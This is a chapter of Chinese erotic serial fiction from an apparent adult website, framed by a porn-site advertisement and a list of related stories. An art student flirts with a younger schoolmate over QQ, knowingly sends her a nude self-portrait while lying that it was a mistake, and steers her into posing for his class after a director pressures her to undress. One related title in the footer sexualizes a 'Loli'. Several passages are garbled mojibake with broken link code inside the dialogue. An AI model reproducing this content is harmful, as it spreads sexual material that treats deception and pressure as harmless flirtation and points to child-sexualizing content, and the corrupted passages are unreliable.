返回

小镇性事(06)(上)作者:丁勃-淫妻奸情c7d

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



字数:13174


读者普遍来信或留言情节夸张,口味偏重,我想说一千篇哈文就有一千个哈妹妹。

而每十个哈妹妹都有可能诞生一个哈哥哥,每个哈哥哥都有自己的写作偏好和风格,我的偏好就是:首先取材要偏,不想读者网上一搜一大把,大家看来看去都那么回事,看了开头就能猜到结尾,如果那样就没有这篇文章了;其次就是情节铺陈,我个人比较喜欢看单元剧,但又希望每个单元剧能上下都有些联系,我的文章计划了十个章节,每章都有自己独自的情节,通过时间线尽量合理的串通起来,并且一章更比一章带起节奏直至最后的高潮,为了保证每章的独立情节,我在口味定位上也纠结很久,我不属于重口味的那种哈哥哥,如果第一章就插入,第二章就肛交,后面就写不下去了。

还有少量读者直指文章太假,我想反问整个板块的文章有多少是真的?又如何来验证?那个山西祖孙三代乱伦的视频多少年才曝出一部?但看完后刺不刺激?刺激就好,在整个篇幅大环境和自己的成长经历似曾相似后,满足内心深处的那个白天不敢想,只敢晚上做做梦的欲望就够了。

不过从本篇幅起,我放慢了些节奏,增加更多的铺陈,语言对话,人物心理,虽然可能有些吊人胃口,但请相信越持久的高潮才越激爽!

如果你既当喷子,又死皮赖脸来看我的文章,那就引用我在四合院的答复:你觉得假就别看,去看你的CCAV,那上面都是真的。

收!!进入正文:下面这段情节并不属于小镇上的故事,本可以写篇番外,不过为了文章的连续性加上之前章节提到会有单独的番外篇,于是就这么着吧。
***********************************
连载六:平面模特(上)

我怀揣着上人体写生课的梦想,高中三年苦练色彩素描写生创作基本功,我父亲也帮了我很多,带我四处拜师学艺,终于,我如愿以偿考进了市里的艺术学院油画系,当老好多次模特,终于自己也可以过过当观众的瘾了,但学校有自己的课程安排,好不容易挨了一年基次到了大二才有资格选修人体写生,结果让我大失所望,模特一个比一个老,还一个比一个丑,艺术类学校国家拨款较少,大多是靠收取高于普通高校一倍的学费以及部分差生的高昂赞助费来维持,于是招聘模特的预算也低的可怜,教授还解释这样的模特才更能提高学生的绘画功底,说的也没错,这些大叔大妈的一堆皱纹死皮老人斑,确实在刻画细节上要多费不少功夫,但这不是我想要的啊,选这门课的大多都是男生,扪心自问,在座的小伙平均年龄20岁不到,正是荷尔蒙分泌最为旺盛的年纪,早知这样还不如逃课闷宿舍里打游戏看黄片了。

有一次来了个70多岁的老头,鸡鸡本来有点萎缩,加上没穿衣服天又冷,更缩的几乎没有了,我在局部特写的时候就直接给省略了,最终的效果我觉得蛮好的,但教授看了后非逼我画上去。

教授姓李,是个约莫60岁上下的老头,一脸络腮胡,戴一副白框眼镜,文艺气息十足,据说在多家杂志报刊都有文章发表,还出了好几本书,是省艺术家协会的副秘书长,同时也是油画系系主任。

「李教授,这怎么画?」

「你可以尝试一下创作!」

「可我还是下不了手,我不知道多大比例合适!」

「你参考一下他的!」

教授指着我旁边的男生的画板。

这时,那模特虽然眼睛没转过来,但可能还是听到了我们的议论,不经意的撸了撸软哒哒的小鸡,虽然没有任何起色,但这个动作还是让几个为数不多的女生偷偷笑出了声,教授咳嗽了两声提醒她们注意自己的言行。

「艺术不一定非要完全的写实,可以试着往美的角度去思考!」

教授继续指导我:「比如你看他的尺度把握的就刚刚好嘛!」

「教授,模特姿势不对了!」

有个胆大的女生举手道,教授抬头看了看模特,眼睛虚起来对比了一下道:「你去调整下!」

我以为教授是跟我说的,我没注意模特哪不对啊,正发愁要怎么调整,还没等我动身,那个举手的女生就自己走上台去,捉住老头的小鸡摆来摆摆去,还轻轻弹了弹微调了下,才满意的回到座位上,而台上的老头表情十分僵硬,估计第一次被个如此年轻的小姑娘这般摆弄,看到这一举动的同学都惊呆了,教室内静悄悄的,只听到教授浑然不知的帮我擦图的声音。

上了几十堂课后,我实在忍受不了这样的折磨,就请同学帮我替课,自己钻宿舍里打游戏,那时候流行个叫《传奇》的网络游戏,高三的时候我就在网吧看人玩过,当时就心痒痒,但迫于高考的压力没有沉迷其中,偶尔玩了玩,还注册个人妖号骗过别人装备,进入大学后,自我感觉学有所成了,加上远离父母,学校管理也十分松懈,便一头扎进网游当中,还和同学一起去过好几次ChinaJoy。

有一届ChinaJoy上,我为了一份传奇大礼包,在盛大展台下排了1个多小时的队,展台上的ShowGirl十分惹眼,Cosplay着女武士,握一把修罗,着一身重盔甲,红丝袜配到膝盖上,搭配游戏版的黑色高筒靴,露出性感的臀部和大腿,从侧面看那身材真是前凸后翘,我当时就想要是这些SG能来做我们的人体模特多好,谁还逃课玩什么游戏啊。

终于排到我了,我来到展柜前,对面做登记的是一个面容清秀身材窈窕的女生,我看到她的胸牌上写着工作人员,编号003,姓名May。

不像展台上那些SG的浓妆艳抹,这个女生只涂了一层很淡的妆,但对我的吸引丝毫不亚于那些SG,用天生丽质来形容一点都不过分,我忍不住咽了咽口水。

「先生,请在这里,这里还有这里登记一下,登记完就可以领取礼品了,谢谢!」

声音也是那么委婉动听,抬手的动作也是那么的优雅,幅度小的都不露出腋下,我真是着迷了。

「先生!哎~先生!」

微微的弯下腰,歪着头看着我。

「哦!不好意思,我走神了!」

这时我才回过神来,当时我的样子一定十分尴尬:「请再说一遍怎么填!」
「嗯,好的先生,请您在这里,这里还有这里一共三处填写好您的个人信息以及联系方式就可以了!」

我本来想胡乱填写个资料,但看到面前的美女,心理上有点想和她主动交往,如果瞎填对我也没什么好处,便认真的填完递给她。

「小姐,你看这样行不行?」

我当时也不知道怎么称呼她合适,慌乱间就随口了一下,好在她也并不介意。
「嗯,应该没什么问题,这是您的…咦!?您和我是一个学校的呀!」
啊哦!莫非还遇到校友了,真是天赐良机啊!「你是!?」

「哦,先生,我是表演系播音主持专业的大一新生,我叫姚雪梅,您可以叫我阿May,喏~这是我的胸牌,呵呵!」

「这么巧哦!哈哈,那我还是你学长哩!名字你也看到了,我是油画系的,比你大一届哦!」

我也礼节性的自我介绍了下:「不要一口一个先生,我听着好别扭,就直呼其名好了,要是叫我学长我更开心,呵呵!」

「哦~哦~学长好!」

「哎~!呵呵,学妹好!」

我俩的距离仿佛一下子拉近了。

「学妹?雪梅?雪梅?学妹?」

我反复的自言自语几遍:「这叫起来很接近哈!那我就叫你雪梅吧,我好喜欢这个名字,真好听!」

「你说的我都不好意思了!」

雪梅头低了下来装出一副不好意思的样子,但是脸并没有红,这时排我后面的可能等不及了,一阵人浪推来,把我给压到展柜上。

「哎!后面排队人多,要不你留个QQ号给我吧!」

∩能展台上有什么激情互动,导致台下突然变得十分拥挤,我感觉现在不太适合交谈,她也有点慌张,就报了串号码,并把游戏礼包领给我后便和其他工作人员维持起秩序来,我本想好好观赏展台美景,但又怕被她看到而留下什么不好的印象,便匆匆挤了出去。

回到宿舍,我第一件事就是加她QQ,但是要验证身份,我发过去后觉得无聊,就准备继续打我的游戏,当切到人物选择界面,看到我的人妖号时,脑海里却浮现出她的身影,这站姿要是是她那是什么感觉呢?后来进了游戏,我也就随机到比奇城外随便找点鸡杀杀打发时间,也不知道杀了多少只鸡,经验条都长了好多,我几个室友也陆陆续续回来了,她怎么还不上线呢?我有点后悔当时怎么没跟她要手机号。

吃过晚饭,叫上室友还有隔壁的几个一起打沙巴克,一直杀到11点多还没杀完,正当我在红名村补刀补得欢快,这时QQ突然咳嗽了两声,她通过了我的好友请求,我立马原地下线退出游戏。

「在?」

我看她头像显示隐身,便主动和她打了招呼。

「嗯!」

她回复的很快。

「刚回来?」

「是啊,累死了!腰都快直不起来了!先不和你说了,等我去洗个澡!」
「哦,好的!」

美女跟说我去洗澡,这么直接的4来对我印象应该不错。

⊥是不知道美女的洗澡要洗多久,我也不能干等着啊,于是接着登上游戏,正好有红名死了爆了一地,我草,你获得了裁决!我大叫出来,室友几个急忙跑过来围观,让我给他们看看,以为我骗他们,我抖着手打开背包正在找格子,突然游戏画面移动了下,我被人野蛮冲撞了,对我当头就是一刀烈火。

还好我也是战士,皮糙肉厚的秒不了我,连忙嗑了两瓶大太阳,硬吃了烈火和几刀刺杀,终于跑回安全区,外面那圈人开始打字骂我有种出来单挑,我也不甘示弱,带上刚拾到的裁决,替下那把没什么持久的炼狱,脱下重盔甲,旋转人物摆起来pose,室友纷纷骂我运气不错,晚上夜宵跑不掉啊,我朝他们笑笑,没有问题,支走他们后我才详细查看那把裁决,祝福+7,我滴个乖乖,真的我是狗屎运走大了,还好没被室友看到,不然一周夜宵都要我买单了!我继续旋转着人物仔细欣赏着裁决,那时候我早快40级了,一直靠当人妖骗装备,最高才骗到个炼狱,裁决简直不敢想的,现在就这么拿在手里,因为裁决的形状很像一根棒子,还是黝黑的棒子,在脱了盔甲的女性角色三点式外形的手里拿着,那画面真是十分淫荡,我看着看着不禁意淫起来,雪梅不是在洗澡么?她现在会不会拿着跟棒子差不多的蓬蓬头在冲洗下身?想着想着我下面都有点硬了。

后来我随机传送出去找甲壳虫练刀玩,大概过了半个小时,QQ总算再次闪烁起来。

「我洗完了,你还在啊?」

她跟我先打起了招呼。

「在啊,我一直在等你!」

我花言巧语道。

「真的假的!我不信,你没干点别的?」

「哦,我在玩游戏,呵呵。」

「是在玩传奇?」

她应该猜到了,不然我干嘛去排队领传奇大礼包。

「是啊,你也玩吗?」

「嗯,应聘的时候考官让我体验过一遍,说要熟悉一些游戏术语备用。」
「那你知道裁决吗?」

「当然知道啊,全名叫裁决之杖嘛,重量80,耐久32,攻击0-30,需要等级30级,如何?」

「你好厉害!佩服!」

「呵呵,承让啦!怎么,你也有吗?」

「你信不信我刚刚在你洗澡的时候拾到一把!」

「真的假的?」

她发来一个惊讶的表情。

「真的!骗你干嘛?刚有个红名死在我面前爆下来被我捡到的。」

「呵呵,有图有真相!」

擦,她居然真不信我,还有图有真相,后半句「没图没鸡巴」

怎么不说,还跟我装,于是我截个图发了过去。

「啊!你真有!」

「骗你又没啥好处!」

「你怎么玩的是女性角色?还没穿衣服?」

她发来一个害羞的表情。

「哦,室友帮我注册的,衣服没持久了要回城修理。」

我撒起慌来真是没图没鸡巴的操行了。

⊥这么有一搭没一搭的聊了半天,我当时也没想过能发生点什么,只要能和她说说话就很开心了。

「对了,你怎么会在展会工作?」

我不想总聊游戏,也想了解了解她。

「哦,我家里条件不太好,学费都是申请的助学贷款,我不好意思开口问家里要钱,而且贷款总要还的,就想利用课余时间出来打打零工赚取点生活费并想提前把贷款还了。」

「哦,这样啊!你好厉害!」

我有点惭愧起来。

「你不会是以为我是去干什么的啊!?」

她好像没看懂我话里的意思,有点急了,弄个小锤子砸我的表情。

「啊,不会!不会!我是真的佩服你呢,不像我,只会贪玩荒废学业。」
「哦,你也不要这么说嘛。玩游戏也是一种生活经历啊!」

她反倒过来安慰我:「我在那家公司接触过一些工作人员,他们就是游戏阅历特别丰富,然后转行做了游戏策划还?a href=http://.ccc36. target=_blank class=infotextkey>性χ嗟摹D悴皇怯突档拿矗慊欢ê芾骱Π。慈プ鲇蜗凡寤κ裁吹亩伎梢缘陌!?br>
「哦?听起来不错啊,我从型喜欢画漫画人物,如果将来能有一份这样的工作又能打游戏那是挺好的哈。」

「肯定啦,哎~你的作品能发我看看吗?我可以帮你推荐过去呢,说不定大学里就可以实习起来了。」

她打字特别快,看起来十分热心主动:「不过你要是不差钱当我没说哈!」
「怎么会,呵呵我要不差钱,我会跑去排一小时队领一个可怜的礼包么?」
我不是不差钱,而是家里给的学费预算里可以没有游戏这项。

「我觉得咱俩挺?a href=http://.ccc36. target=_blank class=infotextkey>性捣值哪兀皇俏胰チ炖癜蛘咭皇悄闳ナ迪埃哿┰趺纯赡苋鲜叮闼的兀俊?br>
我不忘套起近乎。

「是啊,挺?a href=http://.ccc36. target=_blank class=infotextkey>性捣值摹!?br>
她打出一串字给我后半天也没说话,不知道是不是害羞了,我怕冷场,就发了几个作品图片给她。

「不过我现在手里没有拿得出手的漫画作品,都是些人体素描和色彩之类的基次程手稿。」

我怕她乱想,发过去的人体部分男女都有。

她还是半天没回我。

「你在干嘛?」

我有点急了。

「没,没干嘛,我在看你的画呢,我不是太懂美术,就觉得画的挺好的。」
她发过来几个竖起拇指的表情。

「其实我虽然不是学美术的,但我毕竟也是学表演的,知道艺术是个什么概念。」

不知道她是不是怕我有什么误会急忙又补充了一句。

「哦,这是没什么的,天天都要上的课,上的我都麻木了,跟你说我们还互相交换写生呢。」

「什么意思?」

「就是同学之间你画我,我画你啊!互相交换着画。老是画那几个模特都腻了。」

「脱光衣服画?」

「那当然,你以为呢,大家都是学艺术的,对人体早麻木了,就跟在医生眼里的躯体那样,在我们眼里就跟看动植物没太大区别。」

「你们学画画的有女生么?」

她冷不丁发来这一句。

「有啊,不过不多,一个班20来个人,也就3,4个女生吧。」

我老实作答。

「那,那她们不是也要画这些?」

「是啊,男女生都会交换,女生也会画男生。」

「呃…」

她回应后又是半天没反应。

「你想不想再看看我的作品?」

我故意打错字,本来应该打成我当模特的作品,然后没等她答复就直接发了份我的自画像给她,是一份我自己对着镜子创作的超写实人体油画作品,作品中我的三点是完全暴露的。

「呀!你怎么发这种画给我看啊!」

「啊,不好意思我发错了?」

我装作不知道。

「哦,也不算发错,是我当模特,同学给我画的作品,是超写实主义。」
我继续撒谎道:「你知道啥叫超写实主义?」

「哎,我不懂啊,就是字面的意思?比写实更写实?」

「差不多那样,从外行角度来说反正就是跟拍照差不多,而且这张作品还是1:1的,和我真人是同比例的,只是传到电脑里的是后来拍照保存的,尺寸会小了点。」

「哎,你怎么能发这个给我看啊,吓死我了,还好我室友都已经休息了。」
「你看都看了,这又没什么的。」

「对你来说可能没什么,你天天看,可对我不一样啊,而且我一点思想准备都没有,要是别的我不认识的倒也算了,就算是认识的那也是别人,你现在发的图和色情图片有什么区别?你是故意的吧?」

「这…我是不是伤害到你了,如果这样,我向你道歉!」

我确实没想到她会有如此反应,而且越来越激烈。

「道歉有什么用,真希望不认识你,就当网上的图片看看就忘记了。」
「那你说我怎么做才能弥补?」

「把你拉黑名单!」

「别啊!」

我一听急了,真的怕她拉黑我,。

「呵呵,逗你呢!暴露狂!」

她发来一个奸笑的表情:「算了,该不该看都看到了,占我便宜!」

我去,看到我的全身反而说我占她便宜,女生都是这个思维逻辑还是男生不值钱?不过只要她不拉黑我,她想怎么说我都没意见啊。

「你吓我啊!弄的以为自己刚刚谈恋爱就分手。」

我发了一句半开玩笑的话试探下看她什么反应。

「去死!谁跟你谈恋爱啊,你耍流氓!」

她骂起我来,但我感觉这一局更像打情骂俏。

「喂喂!别乱讲啊,谁耍流氓了,我就觉得今天和你的见面像是上天安排好的一样。你刚也明明承认了咱俩?a href=http://.ccc36. target=_blank class=infotextkey>性档模鹄嫡税。?br>
「真说不过你!对了,说到今天,跟你说,我今天挣了200呢,我可是第一次参加这种活动展哎!」

她真会转移话题。

「啊,这么多!」

那时候我一个月生活费也就300。

「其实还能更多,你知道展台上的模特能挣多少吗?1500。」

「哇!这么来钱!」

「多吧!」

她发来个洋洋得意的表情,搞得挣1500的是她一样。

「能挣这么多,那你怎么不去?」

我拿话压了压她。

「那个我不太能接受,穿的也太暴露了。」

「我看你身材很好啊,有资本暴露,别人想暴露还得掂量下自己肚子上的肥肉几斤几两呢。」

「你找死啊!又占我便宜!」

「谁占你便宜啊,你身材好不好你自己最清楚,我就是正常的赞美一下撒,而且你别动不动一口一个去死找死的好不好,一点都不像你外表那么淑女哦!」
我反逗她一下。

「哎呀,实在不好意思,我跟熟悉的人才会这样。」

「哈哈,没关系啦,你这专业应该上过专门的礼仪课程吧,我就怕你习惯了,以后跟领导都这样那就完蛋了,不过话从美女口中讲出来,估计也没哪个领导会介意。」

「你又占我便宜啊!喂!」

她又发了个敲打我的表情。

不知不觉,我们在QQ上聊了上百页,直到告别晚安的时候已经早上4点多了。

接下来几天我们一有机会就会互相主动找对方聊天,有次我去厕所,没开QQ,她可能要找我联系不上,就打我手机,开始我还以为是骚扰电话,结果是她打来的,我都不记得留过电话给她,她告诉我上次领礼包的时候填在资料上被她存下来的,哎我真是粗心。

后来我们持续着这种暧昧的关系有半年多,一起出去看电影,吃饭,逛公园,在她去展会做事的时候我会到场在台下默默的支持,她也私下里偷偷的给我留了好多礼品,我虽没有主动开口追求过她,但她也默认了我俩的关系,并在一次展会做到很晚我送她回宿舍的时候,成功的牵到了她的手,当时我心里就兴奋的要命。

一个天仙般的美女除了惹来我室友的羡慕外,由于经常性的参加这种展会,也被一些宅男频繁的骚扰,这些她也主动和我都坦诚过,并想征询我的意见到底还要不要做下去,而我给她的建议是像她这样的人到哪里都会碰到此类钉子的,只要对方不超越界限就好。

她可能觉得我说的有理,又或者家庭生活压力较大,便继续做下去。

直到有一天,她哭哭啼啼的打我电话,我第一次听到她哭,我也有点紧张,以为出什么大事了。

「丁勃!我今天被公司的市场部总监骚扰了!」

她哭着在电话里说。

「展会不是这周末才开始的么?你不在学校?」

我理智的询问她。

「我现在在回学校的路上,我没坐公交,不想坐,就想多呼吸下冷空气。哎呀!我知道展会是周末啊,是公司市场部的专员电话通知我今天去公司,我问他什么事,他也没说,就说总监找我,之前都是市场部的主管安排我工作计划的,总监亲自找我,弄得我也没怎么想就去了,我当时还有课要上呢,还是请同学帮我去签的到。」

「那后来呢?」

「不是跟你说了被骚扰了吗?他们公司看起来是蛮正规的,我真的没想到会这样,呜呜~~」

她语气有点急了,刚刚停止的哭声又响了起来。

「你别着急啊,你慢慢说啊,我还没搞清楚是怎么回事呢!」

「丁勃,你是想知道我被骚扰的细节吗?我算是看清你了,你们男人都不是好东西!」

「不是啊,雪梅!你真是冤枉我了啊,你知道我不是这个意思!我要是你想的那样,我到现在何止就和你牵手?你说是不是!」

我又撒谎了,虽然行为上我们只牵了手,但我在心里已经和她上床一万次了,除非我不是男人,但我嘴上还是坚持否定。

「算了M当我冤枉你了,怎么?冤枉你一次能死啊!?」

她还来劲了,跟我撒起娇来,不过哭声停下就好。

「好了!好了!你跟我说说到底怎么回事吧。」

「我从没去过总监办公室啊,还是跟着前台去的,到门口后,前台回头走了,我敲门进去,房间里就他一个人,他让我随便坐,还给我倒了杯水,我当时有点胆怯,头都一直低着。」

「你是不是喝了那杯水了?」

「喝了啊!你别多想,那水没什么问题。然后他就让我别太拘谨,说看过我资料是播音主持专业的,应该是比较开放的,我当时也没想过他那句比较开放是什么意思,后来他跟我说他很看重我,觉得我当助手太可惜了,他们这次的展会正好需要一名主持人,问我有没有兴趣,出场费1000,我一听当然很高兴了啊,连忙答应他没有问题,但他却说还要看看我身体素质怎么样,我就站起来原地转了一圈给他看,本来以为差不多行了,他也说还行,但他又说因为我第一次登台,怕那天彩排来不及,递给我一套他早就准备好的衣服,叫要现在就先换上再展示一次给他看,并且还拿来台词给我。」

「你不会真去换衣服了吧!?」

「你一定不相信,我当时真的没多想啊,他年纪跟我爸都差不多了,又是公司高层,就接了过来,我看了下四周,他房间里并没有更衣室,也没有厕所,就想出去找个厕所换下,他却叫我就现场换,跟我说什么提高心理素质,什么来这里面试的模特都是现场换衣服之类的话。」

「他都是屁话!我这上课的模特都是后台换衣服的。」

「是啊,我这个展会的模特也是后台换的,不过男模女模不分开的那种换衣服,后台当时也都是工作人员,我也去过,他们那些模特确实一点都不避讳我们,再说他们也都穿着那种隐形的内衣的。」

感觉雪梅说话开始有点语无伦次了,还略带为自己辩解的口吻。

「哎!我当时真的是什么经验都没有,不知道脑子搭错筋了还是怎么了,稀里糊涂地被他说服了,然后就当着他的面开始换衣服,他也不转身回避我一下,就这么直盯盯的看着我换衣,我想这可能就是为了提高我的心理素质?咬咬牙就把衣服脱下来了。」

「你真脱了!?」

我还是不敢相信。

「真脱了啊,骗你干嘛!不过我今天穿的是很保守的棉质内衣啊,还带了抹胸的,他应该什么都没看到吧,我当时就把自己当做在泳池游泳了。」

「呼~我说呢,我都没看过,你还便宜他,那这也没什么吧?」

她还挺会自我鼓气。

「丁!勃!!你还有兴致逗我,我~我不理你了啊!」

「好好好!我不打岔了!」

「他这时说我什么身材好啊,内衣不像其他模特穿的那么暴露啊,有明星潜质之类的我都听不出是在夸我还是戏弄我的话,还说做主持人都可惜的,只要我同意,以后可以帮我引荐给一线导演,我当然想都没想就拒绝了,后来我快速的换上他给我的衣服,走了一遍台词就结束了。」

大概有10秒钟电话里没在说话。

「就这样?没了?」

「嗯~啊!喂!你想要我怎样啊!」

「没,没!哎,雪梅,我说这根那些宅男又偷看你又吃你豆腐比起来,好像也谈不上什么骚扰吧。」

我突然感觉心理有点失落,只是分不清是故事的嘎然而止挺不过瘾,还是我真的很期盼能发生点什么而没发生的失落。

「你怎么就不懂呢!你记不记得上次你发我你那裸照的事?」

「我发过你裸照?我怎么不记得?」

「哎呀,口误M是那个你当模特的画像撒!」

「哦!怎么了啊,那是艺术!和这个能比?你别跟我说这是行为艺术啊?」
「你记不记得我跟你说过,如果是别人的照片或无论什么画面,只要我不认识他,我都不太当回事,但如果是我周围的人,我就很不舒服,我不知道如何再和对方相处,这个总监,虽然之前没见过面,但以后还是可能会见面合作的啊,周末的展会也不知道他会不会来,反正,我回来的路上越想越不对劲。」

「要不,咱不干了?」

「我第一个反应就是不想干了,但又想想我贷款怎么还呢?我现在也没别的收入来源,你舍得我去饭店洗盘子?」

「我帮你还!」

「算了吧,你没有义务帮我,我们之间又没什么关系!不过还是谢谢你!」
「你怎么这么说呢!我早已把你当成我将来的另一半了,你非要我亲口说出来!」

这我一听有点急了。

「切!我就要你说M要你说!你都没追过我,难道我还倒过来追你啊?」
「没想到你居然这么想,我还以为你也默认了咱俩的关系呢,你先回来吧,回来再说。」

「说什么?」

她的语气里好像充满了期待。

「什么说什么?你让我电话里就追你啊?太简陋了吧!先回来,日后再说!」
我直到最后都不忘逗她一下,不过她好像也听不出来我话里的含义,反正只要她能发泄出来就好了,她那性子我还是摸出点门道的。

晚上我约她到必胜客吃饭,怕她舍不得又怕晚上吃饭的人太多排队,我提前跑去餐厅付了订金把位子锁定,对于没有收入靠从家里拿生活费的我来说,当时人均60的餐费可以让我后面连续几天吃泡面了,这还不算,又花了90买了一扎玫瑰,我真的是下了血本。

我俩都提前了10分钟到那,在必胜客的门口相遇,她明显补了妆,而且衣服肯定也换过了,一件之前我们约会时从未穿过的黑色小礼服,领口开的不算太低,看不到乳沟,但也看不到抹胸,一改在校园里的纯情和在展会上的气质装扮,十分的妩媚动人,我没忍住咽了下口水。

「你在看啥呢?不认识我啊?」

她抬起手在我眼前晃了晃。

「啊!没有,我!你,你太美了啊!不过我在看你背后那只狗狗,哈!你看,可不可爱?」

我吞吞吐吐的差点不知道该说什么,就随便找只狗狗理由解场,其实哪里有狗。

「你真逗!我白天还很不开心,现在一看到你心情就好了!」

她还真掉头看了下。

「送给你!」

我从背后掏出准备好的玫瑰。

「啊!多少钱买的?这很贵吧。」

她一只手捂住嘴,但迟迟未接。

「嗯,血本咯!你不要?不要我送别人了啊!」

说着我装出要跟大堂经理挥手的动作。

「行了行了,我先帮你保管,回头要收你利息哦!」

说罢就一把抢过我手中的玫瑰,我伸出胳膊,她也顺其自然的腕上我一起走进餐厅。

我定的是楼上角落里靠窗的位置,光线非常柔和,就餐的过程也很愉快,一开始我们还是面对面坐着,慢慢地我就以要跟她说个事为理由坐到她旁边,她也没有反对。

「雪梅,我考虑了一下,我觉得你还是不要再去那家公司了。」

「那贷款怎么办?」

她又重复了那句话。

「我现在有没有资格帮你还?」

「你打算怎么做?」

她没正面回答我这个问题,而是抛下下一个问题,但看来她终于默认了我俩的关系,虽然我到现在也没有正式开口追求过她。

「我承认自己没赚钱能力,但我会想办法弄钱的。」

「那我就白吃白喝被你包养的意思?」

「不是啦!你怎么用包养这个词那么难听啊。我现在有一个办法,我觉得蛮好的,既能帮到你,也能帮到我。」

「哦?还有这么好的办法?」

她突然来了兴致,脸转了过来。

「你也看过我的作品了,里面的模特都是又老又丑的,我想介绍你去做我们的模特。」

「啊!你要死啊!让我脱光衣服当模特?」

她反应强烈的推了我下。

「你先听我说完!不是那种人体模特啦,是正常的模特,不脱衣服的,也不会要求你换其他衣服,你平时怎么穿就怎么穿。」

「那听起来还差不多,可是我怎么没看到过你有这样的作品啊!你是不是故意发那些没穿衣服给我的?」

她又一次反映强烈的瞪着我。

「哎呀,没有啦,说起来有点不好意思,算了,跟你说实话把,两种课都有,但是我都只去上人体写生的课,其他课就躲宿舍打游戏了。」

「哦~~我貌似懂了!哎!你好色哎!还口味那么重!」

「艺术!艺术!」

这两字是万能挡箭牌。

「那这课能挣多少钱啊?」

「哪种?」

「什么哪种啊!当然是穿衣服的。」

「哦,是按小时计算的,你要在教室里保持站,坐,或者侧躺的姿势几个小时不能动,而且也分年龄相貌的,像那些大叔大妈一小时估计就10元钱,一天少则3小时,多则8,9个小时都有,你应该至少每小时能挣到20元,我在帮你托托关系25-30应该没问题。」

「听起来好像还可以啊,只是不能动,每天我半天上课,半天打工,3个小时的我应该没问题,这样一天能有60元或者你说的就有90元,哎能不能凑够整数啊,100不用找了。」

她掰着指头算了一算,跟我开起了玩笑。

「你这么差钱啊!那我也把裸模价格报给你好了。」

我也不等她反应就快速说到:「大叔大妈20到50不等,一般男性都会少一些,你的话50到300都有可能,具体要看是半裸还是全裸,以及身材比例是否标准才能定。」

「你就这么想我脱光给别人看吗?」

她突然用肘部顶了下我肚子,看来是真生气了。

「怎么会呢,我就是给你个参考,让你了解下而已,你别多想了,就算脱光,也只能给我一个人看。」

我连忙安慰到,顺便还不忘沾点便宜:「而且你是同校的,又是我介绍的,将来留校或者保送等其他加分项肯定也是优先考虑我俩,我觉得这个机会挺好的,你好好考虑一下。」

后来周末的展会,雪梅真的没去,因为没有什么合同限制,都是临时工,对方公司也那我们没什么办法,雪梅在考虑了一个周末后在QQ上给我留言同意了,我当天就打电话给教授,教授自然很高兴,但是价格一直谈不到心理预期,我直接是往50报价的,这已经达到了半裸的价格了,教授也说太贵了,学校经费紧张之类的理由,最后成交价每小时40元,其中超出的部分教授只能走私账自己掏腰包。

当我把这个好消息在QQ上告诉雪梅时,她什么字也没打,而是发来一个红唇和脸红的表情,我也回了一个红唇和抱抱,并通知她下周一就可以开工了。
果不其然,当我周一下午在我教室外面的楼梯口等来雪梅时,她穿的很保守,我从没见她穿着这么保守过,过时的蓝点白底衬衣,藏青的直筒裤,这衣服跟借来的一样。

「雪梅,你这什么装扮啊?扮村姑呢?」

「啊,这个不行?我网上查了下肖像画的模特好多都这样的穿着,还是特意跟系里申请的呢。」

「你看的都是80年代的作品吧,现在大叔大妈都不这么穿了。」

「那不是给你丢人了?要不,我现在回系里再换下?」

「学校这么大,等你来回走一趟要多久?算,算了,先去吧!下次别再穿成这样了啊!还有,我让教授跟学生保密的,他们不知道你是我女朋友!记住,你的身份就是外聘的,别给我穿帮了。」

「原来你早有准备啊,真怕我给你丢人啊!讨厌!」

她居然也不介意我这么提女朋友三个字,只是抬起一只小粉拳锤在我的肩膀上。

「哪有啊,我这是在保护你,不懂?你就不怕我们同学互相开玩笑吃你豆腐?」
说完我和她保持一定距离:「我先过去,你大概过10分钟后直接敲门进来。」
「各位同学,今天的人像课,我们请来一位年轻的模特,希望大家打起精神,下面开始点名。」

人像课是一另一个讲师上的,开场白后就拿起点名册逐一念了起来。

「丁勃!」

「到!」

「咦?今天没找人替课?」

全班一阵偷笑,我也嘿嘿一笑。

点完名一统计,平时来的今天都来了,平时不来的今天也没来,除了我。
这时就咚咚两声敲门,大家齐刷刷转过头去,只见雪梅轻轻推开门,探出半个头来,两只水汪汪的大眼睛紧张的扫了下教室。

「哇!」

全班男生不约而同的一阵惊叹声,连女生也张开了同样的口型。

「请进!」

「老师,您好!」

雪梅认出了谁是老师,听到老师的邀请后,径直走了过去。

「你好,你是新请来的模特吗?」

「是的,打扰了!」

雪梅很有礼貌,回答的同时还轻轻点了下头。

「哦,你跟同学们做个自我介绍吧,然后咱们的课就开始了。」

讲师说完就挪出位置。

「好的!」

雪梅转过身来面朝大家鞠了一个躬。

「大家好,我是新聘模特,我叫姚雪梅,今年19岁,也是在校大学生,请大家多多关照!」

说完又鞠了个躬,台下稀里哗啦响起一阵掌声。

「好的,同学,之前有做过模特的经验吗?」

「没…这是我第一次做。」

「那好,你今天穿着很有意思,呵呵!这样,你就坐到那张藤椅上,摆个单手托腮的造型,ok?」

「ok!」

雪梅干脆的回答了声,顺着讲师手指的方向走到那张藤椅旁,弯腰吹了吹气,便扶着椅把缓缓坐了上去。

「你还挺有镜头感!这个托腮的造型很有罗马假日的感觉,都不需要我再调整了。对了,记得把手机关机,保持这个动作持续3个小时,每个小时可休息一次,休息时间不超过5分钟,中途如果有事要打断,你就咳嗽一声通知下大家,都记住了吗?」

「嗯,都记住了!」

讲师说完就双手环抱退到学生的一排画架后面,这时有的同学已经开始打稿了,我则故意在玩削铅笔,并不着急作画,更多的是观察其他同学的表情,偷听他们议论什么。

「这个女的很漂亮啊,不知道明天的课她会不会也来。」

「是啊,学校这次花大代价了吧!」

「我跟你打赌她不来,你若输了请我抽根烟就行,若我输,我买包烟给你,怎么样?」

「那我不是占大便宜了?」

「你们没见过女人?要不要我明天上台给你们当一次?」

那个大胆的女生又偷偷小声道。

「切!」

明天的不就是人体课么!不过我心里偷笑,你们想的美呢,呵呵!

(待续)

[本帖最后由艾尔梅瑞于编辑]本帖最近评分记录
艾尔梅瑞金币+13转帖分享,红包献上!
<

评分
相关推荐
3.0分

3.0分 【小镇上发生的故事】 【完】 【作者:wenyazwy】b03

3.0分

3.0分 邻家小嫂作者: 不详-淫妻奸情39f

3.0分

3.0分 隐秘性事 绝对真实 第一章 作者:ruomandike1-淫妻奸情b4f

3.0分

3.0分 小Loli的受精治疗(上)作者:欠肏的小Loli-淫妻奸情563

3.0分

3.0分 性感欲奴(全)作者:不详-淫妻奸情f01

3.0分

